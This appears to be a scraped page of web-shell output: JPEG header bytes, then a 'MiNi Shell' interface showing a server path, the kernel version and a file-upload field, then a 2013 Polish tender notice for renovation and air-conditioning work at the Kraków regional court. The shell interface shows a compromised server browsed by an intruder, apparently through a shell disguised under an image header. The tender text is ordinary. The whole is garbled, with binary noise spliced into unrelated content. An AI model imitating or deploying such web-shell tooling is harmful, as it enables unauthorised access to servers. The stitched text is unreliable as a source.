JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130321/42977-N-2013.html

<p class="kh_header"><b>Kraków: Remont w pomieszczeniach biurowych oraz montaż klimatyzatorów w budynku Sądu Okręgowego w Krakowie</b><br>
<b>Numer ogłoszenia: 42977 - 2013; data zamieszczenia: 21.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Krakowie , ul. Przy Rondzie 7, 31-547 Kraków, woj. małopolskie, tel. 012 6195925, faks 012 6195927.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont w pomieszczeniach biurowych oraz montaż klimatyzatorów w budynku Sądu Okręgowego w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1- Przedmiotem zamówienia jest: Remont w pomieszczeniach biurowych oraz montaż klimatyzatorów w budynku Sądu Okręgowego w Krakowie, zgodnie ze szczegółowym opisem zawartym w SIWZ. 
Wielkość /zakres/ zamówienia: 
Przedmiot zamówienia obejmuje prace remontowe w pomieszczeniach biurowych oraz montaż 3 klimatyzatorów w budynku Sądu Okręgowego w Krakowie, ul. Przy Rondzie 7.
Prace remontowe będą obejmować prace budowlane i instalacyjne, zgodnie z załączonymi przedmiarami i rysunkiem.
Pomieszczenie A-09
Prace budowlane
Należy wykonać ścianki działowe  z płyt gipsowokartonowych na ruszcie metalowym, o łącznej grubości 12,5 cm, z wypełnieniem wełną mineralną do izolacji ścian działowych o grubości 10 cm, które wydzielą 6 pomieszczeń. Ścianki działowe, ruszt, obudowę GK, wełnę mineralną należy doprowadzić do stropu betonowego z miejscowym wycięciem stropu podwieszonego. Połączenia ścianek GK ze stropem i istniejącymi ścianami należy uszczelnić silikonem. 
Na powstałych ściankach działowych oraz istniejących ścianach należy zamontować odbojnice ścienne w kolorze okleiny dąb, szer. 25cm, na wysokości 75cm, oraz wykonać cokolik, o wysokości 10cm, z płytek ceramicznych, jak istniejące posadzki. 
W powstałych ściankach należy osadzić drzwi, z ościeżnicą regulowaną, o izolacyjności akustycznej 32 dB, o szerokości skrzydła 90 cm, w okleinie naturalnej kolor jasny dąb, jak istniejąca stolarka drzwiowa. Miejsca usytuowania drzwi są określone w załączonym rysunku. 
We wszystkich powstałych pomieszczeniach objętych remontem należy przygotować powierzchnię do malowania  i pomalować dwukrotnie farbą emulsyjną akrylową w kolorze białym, a istniejące grzejniki, parapety i  rury c.o. pomalować farbą olejną. 
Sufit podwieszony w części koniecznej do wykonania ścianek działowych i przeprowadzenia prac instalacyjnych należy zdemontować a następnie uzupełnić.
W oknach każdego z 5ciu nowo utworzonych pomieszczeń biurowych, należy zamontować po 2 nawiewniki okienne sterowane ręcznie (w sumie 10 kpl).
Instalacje elektryczne, telefoniczne, komputerowe
W ramach zadania należy doprowadzić do powstałych pomieszczeń instalację elektryczną, telefoniczną i komputerową, w ilościach wskazanych w przedmiarze, do miejsc określonych na rysunku. 
Zasilanie sieci elektrycznej doprowadzić z tablicy rozdzielczej zlokalizowanej przy pomieszczeniu A06.
Sieć strukturalną należy doprowadzić z szafy komputerowej zlokalizowanej na 1 piętrze pawilonu A, bezpośrednio nad remontowanymi pomieszczeniami, przewodami kabelkowymi UTP 4x2x05, kategorii min. 6, układanymi w listwach PCV i kanałach elektroinstalacyjnych. 
W istniejącej szafie komputerowej należy zamontować panel krosowy 19 cali, miedziany,             kategorii 6, umożliwiający montaż 32 modułów RJ45, wykonany w standardzie keystone, aby była możliwość wymiany dowolnego pojedynczego modułu bez konieczności wymiany całego panela, oraz panel porządkujący 19V1U. 
Należy zdemontować rastrowe oprawy oświetleniowe wpuszczane w sufit 60x60cm i przenieść je w miejsca wskazane jak na rysunku.
W nowo wytworzonych pomieszczeniach należy zamontować oświetlenie ewakuacyjne, zgodnie z przedmiarem i rysunkiem.
Prace elektryczne należy wykonywać pod nadzorem osoby o odpowiednich uprawnieniach, a przebieg instalacji należy przedstawić w inwentaryzacji powykonawczej. 
Instalacje sanitarne 
Wyloty (anemostaty) istniejącej klimatyzacji zamontowane w płytach stropowych należy przenieść w miejsca wskazane na rysunku. 
Należy zdemontować 2 grzejniki  żeliwne, w ich miejsce należy zamontować grzejniki                2płytowe, stalowe, o wymiarach 600x500 mm, które zostaną dostarczone przez Zamawiającego. 
Instalacja SAP
Należy zamontować czujki dwu sensorowe optyczno-termiczne DOT4046, zgodne                             z istniejącymi. Po zamontowaniu czujek w pętli, która jest doprowadzona do centrali POLON 4800,  należy przeprogramować centralę przeciwpożarową.
Pomieszczenie K605
Należy wykonać ściankę działową  z płyt gipsowokartonowych na ruszcie metalowym, o łącznej grubości 12,5 cm, z wypełnieniem wełną mineralną do izolacji ścian działowych o grubości 10 cm. Ściankę należy pomalować dwukrotnie farbą emulsyjną kolorową w kolorze białym z uszczelnieniem silikonem połączeń ze stropem i istniejącymi ścianami. Na szerokości powstałej ścianki należy uzupełnić cokolik z płytek ceramicznych w kolorze i gatunku jak istniejąca posadzka.
Pomieszczenie C9
Należy zdemontować istniejącą wykładzinę dywanową, wraz z cokolikiem drewnianym, a następnie wykonać posadzkę z płytek ceramicznych gresowych 30x30 cm oraz cokolik cięty z płytek 30x30 cm o wysokości 10 cm, ścieralność wgłębna < 130 mm2, klasa antypoślizgowości: R10, nasiąkliwość < 0,1%, wytrzymałość na zginanie: min. 45 N/mm2, odporne na plamienie, gatunek I, typ powierzchni: natura-nieszkliwione, kolor jasny beż.
Na istniejących ścianach należy zamontować odbojnice ścienne w kolorze okleiny dąb, szer. 25cm, na wysokości 75cm.
W pomieszczeniu objętym remontem należy przygotować powierzchnię do malowania  i pomalować dwukrotnie farbą emulsyjną akrylową (kolor do uzgodnienia z Inwestorem), a istniejący parapet i  rury c.o.  pomalować farbą olejną.
Należy wymienić istniejące oprawy świetlówkowe, na oprawy rastrowe nt przykręcane, 2świetlówkowe. Należy również wymienić istniejące gniazda: 230V, DATA, telefoniczne oraz łączniki instalacyjne na takie same, lub o nie gorszych parametrach.
Klimatyzacja typu monosplit.
W każdym z pomieszczeń:
1. Pomieszczenie techniczne z szafą DSO, na poziomie 0 pawilonu K (naprzeciwko portierni).
2. Pomieszczenie techniczne z centralą telefoniczną A06, na poziomie -1 pawilonu A.
3. Pomieszczenie informacji telefonicznej (call center), na poziomie 1 pawilonu E (przy Krajowym Rejestrze Karnym);
należy zamontować klimatyzację typu monosplit (system inverterowy), która będzie obsługiwać te pomieszczenia. Jedną jednostkę zewnętrzną i jedną jednostkę wewnętrzną należy dostosować do wielkości pomieszczeń z możliwością sterowania za pomocą pilota zdalnego sterowania, który powinien umożliwiać włączenie i wyłączenie klimatyzatora, regulację temperatury, siły nawiewu, posiadać tryb AUTO regulacji temperatury/prędkości wentylatora, a także tryb pracy samego wentylatora oraz funkcję SWING ustawiania poruszania lamelkami poziomymi.
Wymagania dla jednostek typu monosplit:
funkcje RESTART, JET COOL, AUTO CLEAN, SLEEP oraz 24-godzinny timer,
tryb: chłodzenie (również w zimie)/grzanie/wentylator/osuszanie/auto,
filtr plazmowy,
potrójny filtr powietrza,
filtr antyalergiczny,
funkcja gorącego startu,
klasa energetyczna A/A.
Doboru urządzeń klimatyzacyjnych (ich wydajności chłodniczej/grzewczej, wskaźnika EER/COP itp.) należy dokonać według następujących danych:
1. Pomieszczenie techniczne z szafą DSO:
wymiary pomieszczenia: 1,60x1,50m,
wysokość pomieszczenia: 2,40m,
okno od strony północnej o wymiarach 0,35x1,50m,
w pomieszczeniu znajduje się urządzenie zarządzające systemem DSO, umieszczone w szafie rakowej, klimatyzator ma zapewnić optymalne warunki dla pracy systemów dozorowych DSO, szczególnie w okresie letnim,
jednostkę wewnętrzną należy zamontować na ścianie w pomieszczeniu, natomiast jednostkę zewnętrzną na poziomie tarasu, w bezpośrednim sąsiedztwie pomieszczenia, długość instalacji nie przekroczy 10m, różnica poziomów przebiegu instalacji do 2m (jednostka zewnętrzna poniżej jednostki wewnętrznej). 
2. Pomieszczenie techniczne z centralą telefoniczną A06:
wymiary pomieszczenia : 2,80x6,25m,
wysokość pomieszczenia: 2,95m,
okno od strony północnej o wymiarach 1,55x2,80m,
w pomieszczeniu znajduje się zespół central telefonicznych, obsługujący cały kompleks budynków sądowych, klimatyzator ma zapewnić optymalne warunki dla pracy zespołu central, szczególnie w okresie letnim,
jednostkę wewnętrzną należy zamontować na ścianie w pomieszczeniu, natomiast jednostkę zewnętrzną na ścianie elewacji nad oknem, w bezpośrednim sąsiedztwie pomieszczenia, długość instalacji nie przekroczy 5m, różnica poziomów przebiegu instalacji do 2m (jednostka zewnętrzna powyżej jednostki wewnętrznej).
3. Pomieszczenie informacji telefonicznej (call center):
wymiary pomieszczenia: 2,90x4,30m,
wysokość pomieszczenia: do sufitu podwieszanego z dekoracyjnych płyt gipsowych - 4,00m, do stropu właściwego betonowego - 4,50m,
pomieszczenie umiejscowione jest w środku budynku (bez okien), trzy jego ściany wykonane są jako przeszklenia aluminiowe, natomiast jedna jako ściana żelbetowa,
pracują w nim 4 osoby i są zainstalowane 4 komputery,
jednostkę wewnętrzną należy zamontować na ścianie pomieszczenia, natomiast jednostkę zewnętrzną na ścianie elewacyjnej nad poziomem dachu krótkiego pawilonu C, w bezpośrednim sąsiedztwie pomieszczenia, długość instalacji nie przekroczy 6m, różnica poziomów przebiegu instalacji do 2m (jednostka zewnętrzna powyżej jednostki wewnętrznej).
Wszystkie urządzenia klimatyzacyjne mają zapewnić, w pomieszczeniach, obniżenie temperatury do 210C, w skrajnych warunkach termicznych, tj. 32oC na zewnętrz, za oknem w cieniu.
Przy montażu należy wykonać wszystkie prace wykończeniowe, w szczególności przekucia, malowania, łącznie z elektryczną instalacją zasilającą (osobne obwody do każdego urządzenia). Obwody należy wykonać z przewodu YDY 3x2,5mm2 (w listwach instalacyjnych) i zakończyć je zabezpieczeniami jednofazowymi S typu C-20A w najbliższych tablicach rozdzielczych. Prace elektryczne należy wykonywać pod nadzorem osoby o odpowiednich uprawnieniach, a przebieg instalacji należy przedstawić w inwentaryzacji powykonawczej. 
W pomieszczeniu B-30 należy wykonać otwór do odprowadzenia ciepłego powietrza z przenośnej jednostki klimatyzacyjnej w ścianie zewnętrznej (warstwowej o grubości 39-42cm), o średnicy 120mm, w linii poziomej, z zachowaniem wysokości istniejących już otworów i zaopatrzyć w anemostat od zewnątrz i wewnątrz pomieszczenia, oraz korek styropianowy o grubości 20cm, zamykające dopływ chłodnego powietrza w okresie zimowym.  Po wykonaniu otworu należy przewidzieć naprawę tynku i powłoki malarskiej, na zewnątrz i wewnątrz pomieszczenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 39.71.72.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 49.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium przed upływem terminu składania ofert w wysokości: 2 000 zł (słownie: dwa tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) wymienionego w pkt VI-1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) wymienionego w pkt VI-1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) wymienionego w pkt VI-1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) wymienionego w pkt VI-1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Zamawiający dokona oceny na podstawie oświadczenia wykonawcy w trybie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) wymienionego w pkt VI-1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) pełnomocnictwo /jeśli dotyczy/ do reprezentowania i podpisania dokumentacji ofertowej, jeżeli Wykonawca jest reprezentowany niezgodnie z zapisem we właściwym rejestrze lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej.
2) pisemne zobowiązanie podmiotów /jeśli dotyczy/ w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Kryterium długości okresu gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b></p>
<p>przeprowadzona będzie aukcja elektroniczna:</b> tak, adres strony, na której będzie prowadzona: https://aukcje.uzp.gov.pl</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krakow.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Krakowie, 31-547 Kraków, ul. Przy Rondzie 7, pok.E-232, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2013 godzina 11:00, miejsce: Sąd Okręgowy w Krakowie, 31-547 Kraków, ul. Przy Rondzie 7, pok.E-232, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com